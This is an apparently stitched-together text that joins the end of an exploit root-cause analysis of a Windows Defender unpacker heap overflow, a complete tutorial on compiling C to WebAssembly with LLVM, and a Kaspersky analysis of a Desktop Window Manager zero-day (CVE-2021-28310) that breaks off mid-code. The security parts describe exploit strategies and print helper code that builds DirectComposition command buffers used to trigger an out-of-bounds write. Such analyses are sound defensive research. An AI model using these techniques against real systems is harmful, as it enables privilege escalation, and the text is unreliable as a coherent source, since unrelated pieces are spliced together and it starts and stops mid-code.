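last_addr, last_sz = sections[-1]
overflow = (last_addr + last_sz) - alloc
print(hex(overflow))     # 0x3000 bytes land past the end of the buffer
```

The duplicate entry at 0x2000 never updates the size, so the allocation is 0x2000 bytes while the decompressor writes up to offset 0x5000.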

Patch analysis: There are quite a few changes to the function CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects between version 1.1.17600.5 (vulnerable) and 1.1.17700.4 (patched). The directly related change was to add an else branch to the comparison so that if any entry in the section array has an address less than or equal to the previous entry, the code will error out and exit rather than continuing to decompress.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

It seems possible that this vulnerability was found through fuzzing or manual code review. If the ASProtect unpacking code was included from an external library, that would have made the process of finding this vulnerability even more straightforward for both fuzzing & review.

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

  1. The heap buffer overflow is used to overwrite the data in an object stored as the first field in the lfind_switch object which is allocated in the lfind_switch::switch_out function.
  2. The two fields that were overwritten in the object pointed to by the lfind_switch object are used as indices in lfind_switch::switch_in. Due to no bounds checking on these indices, another out-of-bounds write can occur.
  3. The out-of-bounds write in step 2 performs an OR operation on the field in the VMM_context_t struct (the virtual memory manager within Windows Defender) that stores the length of a table tracking the virtually mapped pages. This field usually equals the number of pages mapped * 2. By performing the OR operations, the value in that field is increased (for example, from 0x0000000C to 0x0003030C). When it’s increased, it allows for an additional out-of-bounds read & write, used for modifying the memory management struct to allow for arbitrary r/w.

Exploit flow:

The exploit uses “primitive bootstrapping” to turn the original buffer overflow into two additional out-of-bounds writes and ultimately gain arbitrary read/write.

Known cases of the same exploit flow: Unknown.

Part of an exploit chain? Unknown.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

  • Review ASProtect unpacker for additional parsing bugs.
  • Review and/or fuzz other unpacking code for parsing and memory issues.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

  • Building mpengine.dll with ASAN enabled should allow for this bug class to be caught.
  • Open sourcing unpackers could allow more folks to find issues in this code, which could potentially detect issues like this more readily.

Ideas to mitigate the exploit flow:

  • Adding bounds checking to anywhere indices are used. For example, if there had been bounds checking when using indices in lfind_switch::switch_in, it would have prevented the 2nd out-of-bounds write which allowed this exploit to modify the VMM_context_t structure.
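
As a minimal illustration of that mitigation (all names here are hypothetical, not taken from the Defender code), validating the attacker-influenced index before the write turns the out-of-bounds OR into a clean error:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model; TABLE_LEN and checked_or_write() are illustrative
 * stand-ins, not symbols from mpengine.dll. */
#define TABLE_LEN 16
static unsigned table[TABLE_LEN];

/* Validate the index before the |= write -- the kind of check that was
 * missing around the indices used in lfind_switch::switch_in. */
static int checked_or_write(size_t idx, unsigned bits) {
    if (idx >= TABLE_LEN)
        return -1;          /* reject instead of writing out of bounds */
    table[idx] |= bits;
    return 0;
}
```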

Other potential improvements:

It appears that by default the Windows Defender emulator runs outside of a sandbox. In 2018, an article announced that Windows Defender Antivirus can now run in a sandbox. The article states that when sandboxing is enabled, you will see a content process MsMpEngCp.exe running in addition to MsMpEng.exe. By default, on Windows 10 machines, I only see MsMpEng.exe running as SYSTEM. Sandboxing the anti-malware emulator by default would make this vulnerability more difficult to exploit, because a sandbox escape would then be required in addition to this vulnerability.

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

  • Detecting these types of 0-days will be difficult: the sample simply drops a new file with the characteristics needed to trigger the vulnerability, such as a section table that includes the same virtual address twice. The exploit method also did not require anything that especially stands out.

Other References

Compiling C to WebAssembly without Emscripten

Original text by Surma

A compiler is just a part of Emscripten. What if we stripped away all the bells and whistles and used just the compiler?

Emscripten is a compiler toolchain for C/C++ targeting WebAssembly. But it does so much more than just compiling. Emscripten’s goal is to be a drop-in replacement for your off-the-shelf C/C++ compiler and make code that was not written for the web run on the web. To achieve this, Emscripten emulates an entire POSIX operating system for you. If your program uses fopen(), Emscripten will bundle the code to emulate a filesystem. If you use OpenGL, Emscripten will bundle code that creates a C-compatible GL context backed by WebGL. That requires a lot of work and also amounts to a lot of code that you need to send over the wire. What if we just… didn’t?

The compiler in Emscripten’s toolchain, the program that translates C code to WebAssembly byte-code, is LLVM. LLVM is a modern, modular compiler framework. LLVM is modular in the sense that it never compiles one language straight to machine code. Instead, it has a front-end compiler that compiles your code to an intermediate representation (IR). This IR is called LLVM, as the IR is modeled around a Low-level Virtual Machine, hence the name of the project. The back-end compiler then takes care of translating the IR to the host’s machine code. The advantage of this strict separation is that adding support for a new architecture “merely” requires adding a new back-end compiler. WebAssembly, in that sense, is just one of many targets that LLVM supports and has been available behind a flag for a while. Since version 8 of LLVM, the WebAssembly target is available by default. If you are on macOS, you can install LLVM using homebrew:

$ brew install llvm
$ brew link --force llvm

To make sure you have WebAssembly support, we can go and check the back-end compiler:

$ llc --version
LLVM (http://llvm.org/):
  LLVM version 8.0.0
  Optimized build.
  Default target: x86_64-apple-darwin18.5.0
  Host CPU: skylake

  Registered Targets:
    # … OMG so many architectures …
    systemz    - SystemZ
    thumb      - Thumb
    thumbeb    - Thumb (big endian)
    wasm32     - WebAssembly 32-bit # 🎉🎉🎉
    wasm64     - WebAssembly 64-bit
    x86        - 32-bit X86: Pentium-Pro and above
    x86-64     - 64-bit X86: EM64T and AMD64
    xcore      - XCore

Seems like we are good to go!

Compiling C the hard way

Note: We’ll be looking at some low-level file formats like raw WebAssembly here. If you are struggling with that, that is ok. You don’t need to understand this entire blog post to make good use of WebAssembly. If you are here for the copy-pastables, look at the compiler invocation in the “Optimizing” section. But if you are interested, keep going! I also wrote an introduction to Raw Webassembly and WAT previously which covers the basics needed to understand this post.

Warning: I’ll bend over backwards here for a bit and use human-readable formats for every step of the process (as much as possible). Our program for this journey is going to be super simple to avoid edge cases and distractions:

// Filename: add.c
int add(int a, int b) {
  return a*a + b;
}

What a mind-boggling feat of engineering! Especially because it’s called “add” but doesn’t actually add. More importantly: This program makes no use of C’s standard library and only uses `int` as a type.

Turning C into LLVM IR

The first step is to turn our C program into LLVM IR. This is the job of the front-end compiler clang that got installed with LLVM:

clang \
  --target=wasm32 \ # Target WebAssembly
  -emit-llvm \ # Emit LLVM IR (instead of host machine code)
  -c \ # Only compile, no linking just yet
  -S \ # Emit human-readable assembly rather than binary
  add.c

And as a result we get add.ll containing the LLVM IR. I’m only showing this here for completeness’ sake. When working with WebAssembly, or even with clang when developing C, you never come into contact with LLVM IR.

; ModuleID = 'add.c'
source_filename = "add.c"
target datalayout = "e-m:e-p:32:32-i64:64-n32:64-S128"
target triple = "wasm32"

; Function Attrs: norecurse nounwind readnone
define hidden i32 @add(i32, i32) local_unnamed_addr #0 {
  %3 = mul nsw i32 %0, %0
  %4 = add nsw i32 %3, %1
  ret i32 %4
}

attributes #0 = { norecurse nounwind readnone "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-frame-pointer-elim"="false" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 8.0.0 (tags/RELEASE_800/final)"}

LLVM IR is full of additional meta data and annotations, allowing the back-end compiler to make more informed decisions when generating machine code.

Turning LLVM IR into object files

The next step is invoking LLVMs backend compiler llc to turn the LLVM IR into an object file:

llc \
  -march=wasm32 \ # Target WebAssembly
  -filetype=obj \ # Output an object file
  add.ll

The output, add.o, is effectively a valid WebAssembly module and contains all the compiled code of our C file. However, most of the time you won’t be able to run object files as essential parts are still missing.

If we omitted -filetype=obj we’d get LLVM’s assembly format for WebAssembly, which is human-readable and somewhat similar to WAT. However, the tool that can consume these files, llvm-mc, does not fully support this text format yet and often fails to consume the output of llc. So instead we’ll disassemble the object files after the fact. Object files are target-specific and therefore need a target-specific tool to inspect them. In the case of WebAssembly, the tool is wasm-objdump, which is part of the WebAssembly Binary Toolkit, or wabt for short.

$ brew install wabt # in case you haven’t
$ wasm-objdump -x add.o

add.o:  file format wasm 0x1

Section Details:

Type[1]:
 - type[0] (i32, i32) -> i32
Import[3]:
 - memory[0] pages: initial=0 <- env.__linear_memory
 - table[0] elem_type=funcref init=0 max=0 <- env.__indirect_function_table
 - global[0] i32 mutable=1 <- env.__stack_pointer
Function[1]:
 - func[0] sig=0 <add>
Code[1]:
 - func[0] size=75 <add>
Custom:
 - name: "linking"
  - symbol table [count=2]
   - 0: F <add> func=0 binding=global vis=hidden
   - 1: G <env.__stack_pointer> global=0 undefined binding=global vis=default
Custom:
 - name: "reloc.CODE"
  - relocations for section: 3 (Code) [1]
   - R_WASM_GLOBAL_INDEX_LEB offset=0x000006(file=0x000080) symbol=1 <env.__stack_pointer>

The output shows that our add() function is in this module, but it also contains custom sections filled with metadata and, surprisingly, a couple of imports. In the next phase, called linking, the custom sections will be analyzed and removed and the imports will be resolved by the linker.

Linking

Traditionally, the linker’s job is to assemble multiple object files into an executable. LLVM’s linker is called lld, but it has to be invoked with one of the target-specific symlinks. For WebAssembly, there is wasm-ld.

wasm-ld \
  --no-entry \ # We don’t have an entry function
  --export-all \ # Export everything (for now)
  -o add.wasm \
  add.o

The output is a 262-byte WebAssembly module.

Running it

Of course the most important part is to see that this actually works. As we did in the previous blog post, we can use a couple lines of inline JavaScript to load and run this WebAssembly module.

<!DOCTYPE html>

<script type="module">
  async function init() {
    const { instance } = await WebAssembly.instantiateStreaming(
      fetch("./add.wasm")
    );
    console.log(instance.exports.add(4, 1));
  }
  init();
</script>

If nothing went wrong, you should see a 17 in your DevTools console. We just successfully compiled C to WebAssembly without touching Emscripten. It’s also worth noting that there is no glue code required to set up and load the WebAssembly module.

Compiling C the slightly less hard way

The number of steps we currently need to get from C code to WebAssembly is a bit daunting. As I said, I was bending over backwards for educational purposes. Let’s stop doing that, skip all the human-readable intermediate formats, and use the C compiler as the swiss-army knife it was designed to be:

clang \
  --target=wasm32 \
  -nostdlib \ # Don’t try and link against a standard library
  -Wl,--no-entry \ # Flags passed to the linker
  -Wl,--export-all \
  -o add.wasm \
  add.c

This will produce the same .wasm file as before, but with a single command.

Optimizing

Let’s take a look at the WAT of our WebAssembly module by running wasm2wat:

(module
  (type (;0;) (func))
  (type (;1;) (func (param i32 i32) (result i32)))
  (func $__wasm_call_ctors (type 0))
  (func $add (type 1) (param i32 i32) (result i32)
    (local i32 i32 i32 i32 i32 i32 i32 i32)
    global.get 0
    local.set 2
    i32.const 16
    local.set 3
    local.get 2
    local.get 3
    i32.sub
    local.set 4
    local.get 4
    local.get 0
    i32.store offset=12
    local.get 4
    local.get 1
    i32.store offset=8
    local.get 4
    i32.load offset=12
    local.set 5
    local.get 4
    i32.load offset=12
    local.set 6
    local.get 5
    local.get 6
    i32.mul
    local.set 7
    local.get 4
    i32.load offset=8
    local.set 8
    local.get 7
    local.get 8
    i32.add
    local.set 9
    local.get 9
    return)
  (table (;0;) 1 1 anyfunc)
  (memory (;0;) 2)
  (global (;0;) (mut i32) (i32.const 66560))
  (global (;1;) i32 (i32.const 66560))
  (global (;2;) i32 (i32.const 1024))
  (global (;3;) i32 (i32.const 1024))
  (export "memory" (memory 0))
  (export "__wasm_call_ctors" (func $__wasm_call_ctors))
  (export "__heap_base" (global 1))
  (export "__data_end" (global 2))
  (export "__dso_handle" (global 3))
  (export "add" (func $add)))

Wowza, that’s a lot of WAT. To my surprise, the module uses memory (indicated by the i32.load and i32.store operations), 8 local variables and a couple of globals. If you think you’d be able to write a shorter version by hand, you’d probably be right. The reason this program is so big is that we didn’t have any optimizations enabled. Let’s change that:

 clang \
   --target=wasm32 \
+  -O3 \ # Aggressive optimizations
+  -flto \ # Add metadata for link-time optimizations
   -nostdlib \
   -Wl,--no-entry \
   -Wl,--export-all \
+  -Wl,--lto-O3 \ # Aggressive link-time optimizations
   -o add.wasm \
   add.c

Note: Technically, link-time optimizations don’t bring us any gains here as we are only linking a single file. In bigger projects, LTO will help you keep your file size down.

After running the commands above, our .wasm file went down from 262 bytes to 197 bytes and the WAT is much easier on the eye, too:

(module
  (type (;0;) (func))
  (type (;1;) (func (param i32 i32) (result i32)))
  (func $__wasm_call_ctors (type 0))
  (func $add (type 1) (param i32 i32) (result i32)
    local.get 0
    local.get 0
    i32.mul
    local.get 1
    i32.add)
  (table (;0;) 1 1 anyfunc)
  (memory (;0;) 2)
  (global (;0;) (mut i32) (i32.const 66560))
  (global (;1;) i32 (i32.const 66560))
  (global (;2;) i32 (i32.const 1024))
  (global (;3;) i32 (i32.const 1024))
  (export "memory" (memory 0))
  (export "__wasm_call_ctors" (func $__wasm_call_ctors))
  (export "__heap_base" (global 1))
  (export "__data_end" (global 2))
  (export "__dso_handle" (global 3))
  (export "add" (func $add)))

Calling into the standard library

Now, C without the standard library (called “libc”) is pretty rough. It seems logical to look into adding a libc as a next step, but I’m going to be honest: It’s not going to be easy. I actually won’t link against any libc in this blog post. There are a couple of libc implementations out there that we could grab, most notably glibc, musl and dietlibc. However, most of these libraries expect to run on a POSIX operating system, which implements a specific set of syscalls (calls to the system’s kernel). Since we don’t have a kernel interface in JavaScript, we’d have to implement these POSIX syscalls ourselves, probably by calling out to JavaScript. This is quite the task and I am not going to do that here. The good news is: This is exactly what Emscripten does for you.

Not all of libc’s functions rely on syscalls, of course. Functions like strlen(), sin() or even memset() are implemented in plain C. That means you could use these functions or even just copy/paste their implementation from one of the libraries above.
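
For instance, a freestanding, syscall-free version of two of these functions is only a few lines. A sketch (prefixed with my_ here to avoid clashing with compiler built-ins):

```c
#include <assert.h>
#include <stddef.h>

/* Freestanding sketches of libc functions that need no kernel support.
 * The my_ prefix avoids colliding with compiler built-ins. */
size_t my_strlen(const char *s) {
    const char *p = s;
    while (*p) p++;                        /* scan to the NUL terminator */
    return (size_t)(p - s);
}

void *my_memset(void *dst, int c, size_t n) {
    unsigned char *d = dst;
    while (n--) *d++ = (unsigned char)c;   /* byte-wise fill */
    return dst;
}
```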

Dynamic memory

With no libc at hand, fundamental C APIs like malloc() and free() are not available. In our unoptimized WAT above we have seen that the compiler will make use of memory if necessary. That means we can’t just use the memory however we like without risking corruption. We need to understand how that memory is used.

LLVM’s memory model

The way the WebAssembly memory is segmented is dictated by wasm-ld and might take C veterans a bit by surprise. Firstly, address 0 is technically valid in WebAssembly, but will often still be handled as an error case by a lot of C code. Secondly, the stack comes first and grows downwards (towards lower addresses) and the heap comes after it and grows upwards. The reason for this is that WebAssembly memory can grow at runtime. That means there is no fixed end to place the stack or the heap at.

The layout that wasm-ld uses is the following:

A depiction of the wasm-ld’d memory layout.
The stack grows downwards and the heap grows upwards. The stack starts at __data_end, the heap starts at __heap_base. Because the stack is placed first, it is limited to a maximum size set at compile time, which is __heap_base - __data_end.

If we look back at the globals section in our WAT we can find these symbols defined. __heap_base is 66560 and __data_end is 1024. This means that the stack can grow to a maximum of 64KiB, which is not a lot. Luckily, wasm-ld allows us to configure this value:

 clang \
   --target=wasm32 \
   -O3 \
   -flto \
   -nostdlib \
   -Wl,--no-entry \
   -Wl,--export-all \
   -Wl,--lto-O3 \
+  -Wl,-z,stack-size=$[8 * 1024 * 1024] \ # Set maximum stack size to 8MiB
   -o add.wasm \
   add.c

Building an allocator

We now know that the heap region starts at __heap_base and since there is no malloc() function, we know that the memory region from there on upwards is ours to control. We can place data in there however we like and don’t have to fear corruption as the stack is growing the other way. Leaving the heap as a free-for-all can get hairy quickly, though, so usually some sort of dynamic memory management is needed. One option is to pull in a full malloc() implementation like Doug Lea’s malloc implementation, which is used by Emscripten today. There are also a couple of smaller implementations with different tradeoffs.

But why don’t we write our own malloc()? We are in this deep, we might as well. One of the simplest allocators is a bump allocator. The advantages: It’s super fast, extremely small and simple to implement. The downside: You can’t free memory. While this seems incredibly useless at first sight, I have encountered use-cases while working on Squoosh where this would have been an excellent choice. The concept of a bump allocator is that we store the start address of unused memory as a global. If the program requests n bytes of memory, we advance that marker by n and return the previous value:

extern unsigned char __heap_base;

unsigned int bump_pointer = (unsigned int)&__heap_base;
void* malloc(int n) {
  unsigned int r = bump_pointer;
  bump_pointer += n;
  return (void *)r;
}

void free(void* p) {
  // lol
}

The globals we saw in the WAT are actually defined by wasm-ld, which means we can access them from our C code as normal variables if we declare them as extern. We just wrote our own malloc() in, like, 5 lines of C 😱

Note: Our bump allocator is not fully compatible with C’s malloc(). For example, we don’t make any alignment guarantees. But it’s good enough and it works, so 🤷‍♂️.
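
If alignment ever matters, rounding the bump pointer up costs one extra line. A sketch (the static array here is a stand-in for the region past __heap_base; in the real module you would use `extern unsigned char __heap_base;` instead):

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

/* Stand-in for the memory past __heap_base. */
static _Alignas(8) unsigned char heap[1024];
static size_t bump;                       /* offset into the heap region */

void *aligned_malloc(size_t n) {
    bump = (bump + 7) & ~(size_t)7;       /* round up to an 8-byte boundary */
    void *r = &heap[bump];
    bump += n;
    return r;
}
```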

Using dynamic memory

To prove that this actually works, let’s build a C function that takes an arbitrary-sized array of numbers and calculates the sum. Not very exciting, but it does force us to use dynamic memory, as we don’t know the size of the array at build time:

int sum(int a[], int len) {
  int sum = 0;
  for(int i = 0; i < len; i++) {
    sum += a[i];
  }
  return sum;
}

The sum() function is hopefully straightforward. The more interesting question is how we can pass an array from JavaScript to WebAssembly — after all, WebAssembly only understands numbers. The general idea is to use malloc() from JavaScript to allocate a chunk of memory, copy the values into that chunk and pass the address (a number!) of where the array is located:

<!DOCTYPE html>

<script type="module">
  async function init() {
    const { instance } = await WebAssembly.instantiateStreaming(
      fetch("./add.wasm")
    );

    const jsArray = [1, 2, 3, 4, 5];
    // Allocate memory for 5 32-bit integers
    // and get the starting address.
    const cArrayPointer = instance.exports.malloc(jsArray.length * 4);
    // Turn that sequence of 32-bit integers
    // into a Uint32Array, starting at that address.
    const cArray = new Uint32Array(
      instance.exports.memory.buffer,
      cArrayPointer,
      jsArray.length
    );
    // Copy the values from JS to C.
    cArray.set(jsArray);
    // Run the function, passing the starting address and length.
    console.log(instance.exports.sum(cArrayPointer, cArray.length));
  }
  init();
</script>

When running this you should see a very happy 15 in the DevTools console, which is indeed the sum of all the numbers from 1 to 5.

You made it to the end. Congratulations! Again, if you feel a bit overwhelmed, that’s okay: This is not required reading. You do not need to understand all of this to be a good web developer or even to make good use of WebAssembly. But I did want to share this journey with you as it really makes you appreciate all the work that a project like Emscripten does for you. At the same time, it gave me an understanding of how small purely computational WebAssembly modules can be. The Wasm module for the array summing ended up at just 230 bytes, including an allocator for dynamic memory. Compiling the same code with Emscripten would yield 100 bytes of WebAssembly accompanied by 11K of JavaScript glue code. It took a lot of work to get there, but there might be situations where it is worth it.

Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild

Original text by Costin Raiu Boris Larin Brian Bartholomew

While analyzing the CVE-2021-1732 exploit originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft released a patch to this vulnerability as a part of its April security updates.

We believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren’t able to capture a full chain, so we don’t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.

The exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.

Technical details

CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. DirectComposition is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We’ve already published a blogpost about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string “NtDComposition”.

DirectComposition syscalls in the win32kbase.sys driver

For exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.

enum DCOMPOSITION_COMMAND_ID
{
    ProcessCommandBufferIterator,
    CreateResource,
    OpenSharedResource,
    ReleaseResource,
    GetAnimationTime,
    CapturePointer,
    OpenSharedResourceHandle,
    SetResourceCallbackId,
    SetResourceIntegerProperty,
    SetResourceFloatProperty,
    SetResourceHandleProperty,
    SetResourceHandleArrayProperty,
    SetResourceBufferProperty,
    SetResourceReferenceProperty,
    SetResourceReferenceArrayProperty,
    SetResourceAnimationProperty,
    SetResourceDeletedNotificationTag,
    AddVisualChild,
    RedirectMouseToHwnd,
    SetVisualInputSink,
    RemoveVisualChild
};

List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator

While these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall – NtDCompositionCommitChannel.

To trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.

void CreateResourceCmd(int resourceId)
{
    DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
    *buf = CreateResource;
    buf[1] = resourceId;
    buf[2] = PropertySet; // MIL_RESOURCE_TYPE
    buf[3] = FALSE;
    BatchLength += 16;
}

void ReleaseResourceCmd(int resourceId)
{
    DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
    *buf = ReleaseResource;
    buf[1] = resourceId;
    BatchLength += 8;
}

void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)
{
    DWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);
    *buf = SetResourceBufferProperty;
    buf[1] = resourceId;
    buf[2] = update;
    buf[3] = 20;
    buf[4] = propertyId;
    buf[5] = storageOffset;
    buf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE
    buf[7] = hidword;
    buf[8] = lodword;
    BatchLength += 36;
}

Format of commands used in exploitation

Let’s take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.

int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, …)
{
  …
 
  if (expression_type == _D2DVector2)
  {
    if (!update)
    {
      CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);
    }
    else
    {
      if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )
      {
        goto fail;
      }
 
      CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);
    }
  }
 
  …
}
 
int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)
{
  int propertyIdAdded;
 
  int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(
     this->propertiesData,
     type,
     value,
     &propertyIdAdded);
  if ( result < 0 )
  {
    return result;
  }
 
  if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )
  {
    return 0x88980403;
  }
 
  result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);
  if ( result < 0 )
  {
    return result;
  }
 
  return 0;
}
 
int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)
{
  if ( this->properties[propertyId]->type == type )
  {
    *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;
 
    int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);
    if ( result < 0 )
    {
      return result;
    }
 
    return 0;
  }
  else
  {
    return 0x80070057;
  }
}

Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll

For the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(…) would either call CPropertySet::AddProperty<D2DVector2>(…) or CPropertySet::UpdateProperty<D2DVector2>(…) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(…) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that’s not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(…) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.

(1) storageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF
(2) this->properties[propertyId]->type == type

Conditions which need to be met for exploitation in dwmcore.dll

These checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.

At the time of writing, we still hadn’t analyzed the updated binaries that fix this vulnerability, but to exclude the possibility of other variants of this vulnerability, Microsoft would need to check the count of properties for other expression types as well.
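
A hedged sketch of the missing validation, modeled on simplified structures (field and function names are illustrative, not the actual dwmcore.dll layout):

```c
#include <assert.h>

/* Simplified model of the property table. */
#define MAX_PROPERTIES 8
struct property { int type; unsigned offset; };
struct property_set {
    struct property props[MAX_PROPERTIES];
    unsigned count;                 /* properties actually added */
};

/* The guard absent from CPropertySet::UpdateProperty<D2DVector2>: reject
 * propertyId values beyond the number of properties on the resource. */
static unsigned update_property(struct property_set *s, unsigned propertyId, int type) {
    if (propertyId >= s->count)
        return 0x80070057u;         /* same error code as the type check below */
    if (s->props[propertyId].type != type)
        return 0x80070057u;         /* as in the decompiled code */
    /* ... the 8-byte store into propertiesData would happen here ... */
    return 0;
}
```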

Even with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won’t be triggered because there is one more thing preventing it from happening.

As mentioned above, commands are first processed by the kernel and only then sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, the NtDCompositionProcessChannelBatchBuffer syscall returns an error and the command is never passed to the dwm.exe process. SetResourceBufferProperty commands with the expression type set to D2DVector2 are processed in the win32kbase.sys driver by the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(…) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(…), which are very similar to those present in dwmcore.dll (it is quite likely they were copy-pasted). However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference: it actually checks the count of properties added to the resource.

DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(…) in win32kbase.sys
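The kernel-side difference can be sketched as follows. This is an illustrative model, not the real win32kbase.sys code: the only change from the user-mode version modeled earlier is the bounds check on propertyId, which causes the syscall to fail before the command ever reaches dwm.exe.

```cpp
#include <cstdint>
#include <vector>

// Hypothetical sketch of CPropertySetMarshaler::UpdateProperty<D2DVector2>
// in win32kbase.sys; structure and names are illustrative only.
struct MarshalerPropertySet {
    std::vector<uint32_t> propertyTypes;  // stand-in for the real property array

    bool UpdateProperty(uint32_t propertyId, uint32_t type) {
        if (propertyId >= propertyTypes.size())  // the extra kernel-mode check
            return false;  // error returned; command never forwarded to dwm.exe
        if (propertyTypes[propertyId] != type)
            return false;
        return true;
    }
};
```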

The check for propertiesCount in the kernel-mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user-mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(…) comes into play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user-mode variant: it exhibits the same check-after-add behavior, returning an error if the propertyId and storageOffset of the created property do not match the provided values. Because of this, it is possible to use the AddProperty<D2DVector2> function to add a new property while forcing the function to return an error, causing an inconsistency between the number of properties assigned to the same resource in kernel mode and user mode. The propertiesCount check in the kernel can be bypassed this way, and malicious commands are then passed on to Desktop Window Manager (dwm.exe).
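The resulting desynchronization can be simulated with a small model. This is not real code: the kernel side appends before validating (check-after-add), and on a forced validation failure the command is never forwarded, so only the kernel-side count grows. An id that then passes the kernel bounds check can be out of range in user mode.

```cpp
#include <cstdint>

// Illustrative model of the kernel/user property-count desync.
struct Counts {
    uint32_t kernel = 0;
    uint32_t user = 0;
};

// expectedId mismatching the actual index models the attacker forcing
// the check-after-add validation in the kernel to fail.
bool AddProperty(Counts &c, uint32_t expectedId) {
    uint32_t actualId = c.kernel;
    c.kernel++;                    // appended before the check
    if (actualId != expectedId)
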